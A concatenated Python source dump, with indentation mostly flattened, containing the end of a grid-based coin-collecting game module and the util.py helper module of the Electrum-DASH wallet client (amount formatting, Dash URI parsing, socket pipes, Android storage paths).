move = player.move_result()
if move is not None:
self.do_player_move(player, move)
def start_game(self):
for player in self.players.values():
player.start_player()
            # Collect coins at the starting position (no actual move is made)
            self.do_player_move(player, None, start_game=True)
self.game_thread.start()
self.state = STARTED
def stop_game(self):
# Stop game thread
self.stop = True
self.game_thread.join()
# Stop all players
for player in self.players.values():
player.stop_player()
def _game(self):
while True:
self.do_move()
if self.is_gameover():
self.state = GAMEOVER
break
def is_gameover(self):
if len(self.playground.points) == 0 or self.n_move >= self.max_move or self.stop:
return True
return False
def is_going(self):
return self.game_thread.is_alive()
def player_info(self, player_name):
info = dict()
info["map"] = copy.deepcopy(self.playground.map)
info["coins"] = copy.deepcopy(self.playground.points)
info["players"] = [(p.x, p.y) for p in self.players.values() if p.name != player_name]
info["x"] = self.players[player_name].x
info["y"] = self.players[player_name].y
return info
def get_points(self):
self.lock.acquire()
points = copy.deepcopy(self.playground.points)
self.lock.release()
return points
def get_players(self):
self.lock.acquire()
players = [PlayerInfo(p) for p in self.players.values()]
self.lock.release()
return players
def get_gameinfo(self):
info = {
"move": self.n_move,
"max_move": self.max_move
}
return info
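# ---------------------------------------------------------------------------
# Editor's usage sketch (not part of the original module): a tiny game with a
# single random-walk player. The 3x3 map and the player logic are made up for
# illustration only.
# ---------------------------------------------------------------------------
def random_walker(info, ctx=None):
    """Example move function: ignores the game info and walks randomly."""
    return random.choice([UP, DOWN, LEFT, RIGHT])

if __name__ == "__main__":
    field = Playground([
        [FREE, FREE, FREE],
        [FREE, WALL, FREE],
        [FREE, FREE, FREE],
    ])
    field.add_point(2, 2)
    game = Game(field, max_move=20, movetime=0.1)
    game.add_player(Player("walker", random_walker, x=0, y=0))
    game.start_game()
    while game.is_going():
        time.sleep(0.2)
    game.stop_game()
    for p in game.get_players():
        print(p.name, "score:", p.score, "timeouts:", p.timeout)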
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'DASH':8, 'mDASH':5, 'uDASH':2}
fee_levels = [_('Within 25 blocks'), _('Within 10 blocks'), _('Within 5 blocks'), _('Within 2 blocks'), _('In the next block')]
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
# Raised when importing a key that's already in the wallet.
class AlreadyHaveAddress(Exception):
def __init__(self, msg, addr):
super(AlreadyHaveAddress, self).__init__(msg)
self.addr = addr
class NotEnoughFunds(Exception): pass
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
# TODO: disable
is_verbose = True
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
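# Editor's note (illustrative only): typical use of the @profiler decorator;
# the timing line is printed only while is_verbose is True.
#
#   @profiler
#   def load_history(path):
#       ...
#
#   load_history("/tmp/history")   # prints: [profiler] load_history 0.0123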
def android_headers_file_name():
    from .bitcoin import TESTNET
s = 'blockchain_headers'
if TESTNET:
s += '_testnet'
return s
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum-dash.electrum-dash'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum-dash'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + android_headers_file_name()
old_headers_path = old_electrum_dir + android_headers_file_name()
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum-dash")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum-DASH")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-DASH")
else:
#raise Exception("No home directory found in environment variables.")
return
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, is_diff=False, num_zeros = 0, decimal_point = 8, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
x = int(x) # Some callers pass Decimal
scale_factor = pow (10, decimal_point)
integer_part = "{:n}".format(int(abs(x) / scale_factor))
if x < 0:
integer_part = '-' + integer_part
elif is_diff:
integer_part = '+' + integer_part
dp = localeconv()['decimal_point']
fract_part = ("{:0" + str(decimal_point) + "}").format(abs(x) % scale_factor)
fract_part = fract_part.rstrip('0')
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
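# Editor's note (illustrative only): expected behaviour of the two formatters
# above, assuming a "C"-style locale (format_satoshis is locale-aware, so the
# decimal point and grouping may differ on other systems).
#
#   format_satoshis_plain(150000000)            -> '1.5'
#   format_satoshis(1234500, num_zeros=2)       -> '0.012345'
#   format_satoshis(-1234500, is_diff=True)     -> '-0.012345'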
def timestamp_to_datetime(timestamp):
try:
return datetime.fromtimestamp(timestamp)
except:
return None
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'Dash.org': ('https://explorer.dash.org',
{'tx': 'tx', 'addr': 'address'}),
'Bchain.info': ('https://bchain.info/DASH',
{'tx': 'tx', 'addr': 'addr'}),
'system default': ('blockchain:',
{'tx': 'tx', 'addr': 'address'}),
}
testnet_block_explorers = {
'Dash.org': ('https://test.insight.dash.siampm.com',
{'tx': 'tx', 'addr': 'address'}),
'system default': ('blockchain:',
{'tx': 'tx', 'addr': 'address'}),
}
def block_explorer_info():
from . import bitcoin
return testnet_block_explorers if bitcoin.NetworkConstants.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'Dash.org')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return "/".join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise BaseException("Not a Dash address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'dash':
raise BaseException("Not a Dash URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise BaseException("Invalid Dash address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
        m = re.match(r'([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
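# Editor's note (illustrative only): for a valid Dash address <addr>,
#
#   parse_URI('dash:<addr>?amount=1.2&message=rent')
#
# returns approximately
#   {'address': <addr>, 'amount': 120000000, 'message': 'rent', 'memo': 'rent'}
# (the amount is converted to duffs via COIN); a bare address string is also
# accepted and returns just {'address': <addr>}.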
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='dash', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
def utfify(arg):
"""Convert unicode argument to UTF-8.
Used when loading things that must be serialized.
"""
if isinstance(arg, dict):
return {utfify(k): utfify(v) for k, v in arg.items()}
elif isinstance(arg, list):
return map(utfify, arg)
elif isinstance(arg, str):
return arg.encode('utf-8')
return arg
class timeout(Exception):
pass
import socket
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
except OSError as e:
print_error("OSError", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
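# Editor's note (illustrative only): two QueuePipe ends can be cross-wired to
# emulate a bidirectional in-process connection.
#
#   a_to_b, b_to_a = queue.Queue(), queue.Queue()
#   side_a = QueuePipe(send_queue=a_to_b, get_queue=b_to_a)
#   side_b = QueuePipe(send_queue=b_to_a, get_queue=a_to_b)
#   side_a.send({'id': 1, 'method': 'server.version'})
#   side_b.get()   # -> {'id': 1, 'method': 'server.version'}
#   side_b.get()   # raises `timeout` after 0.1 s (the default)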
def check_www_dir(rdir):
import urllib, shutil, os
if not os.path.exists(rdir):
os.mkdir(rdir)
index = os.path.join(rdir, 'index.html')
if not os.path.exists(index):
print_error("copying index.html")
src = os.path.join(os.path.dirname(__file__), 'www', 'index.html')
shutil.copy(src, index)
files = [
"https://code.jquery.com/jquery-1.9.1.min.js",
"https://raw.githubusercontent.com/davidshimjs/qrcodejs/master/qrcode.js",
"https://code.jquery.com/ui/1.10.3/jquery-ui.js",
"https://code.jquery.com/ui/1.10.3/themes/smoothness/jquery-ui.css"
]
for URL in files:
path = urllib.parse.urlsplit(URL).path
filename = os.path.basename(path)
path = os.path.join(rdir, filename)
if not os.path.exists(path):
print_error("downloading ", URL)
urllib.request.urlretrieve(URL, path)
|